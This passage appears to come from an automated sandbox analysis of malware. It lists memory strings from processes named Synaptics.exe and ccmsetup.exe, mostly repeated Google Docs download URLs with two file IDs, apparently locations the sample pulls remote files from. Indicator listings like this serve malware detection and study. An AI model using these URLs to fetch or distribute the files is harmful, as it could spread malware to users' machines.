                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncisc
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnet
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetleB
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetleniyor...
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadni
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniW
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnirjsG.0
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnn
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnt.go
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnw
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado.ZpRE
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado.gl
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1W
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadocook
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom.t
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadon
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonte
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...5
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadors=
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoublez
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp-me
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp9
                              Source: Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp?.F
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadph
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.bkcFG$
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr1
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrE
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrIGE
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrm
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadroid
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrv;
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads-
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads:DC
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads=
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsHxF0
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsOGlE
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsOGlEu
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsezvrGe0
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadspre
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadst
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsx
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtest.e
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtiY
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtoju
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtrus
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduCTD
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadub
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadufWEV
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduser4
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadut
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadveladservices
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvgHGD
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvine.
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadving
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwI
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx:=DB
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxe
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx~
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyaUE
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadytics
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz6sG0
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadza
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~7wF#
                              Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
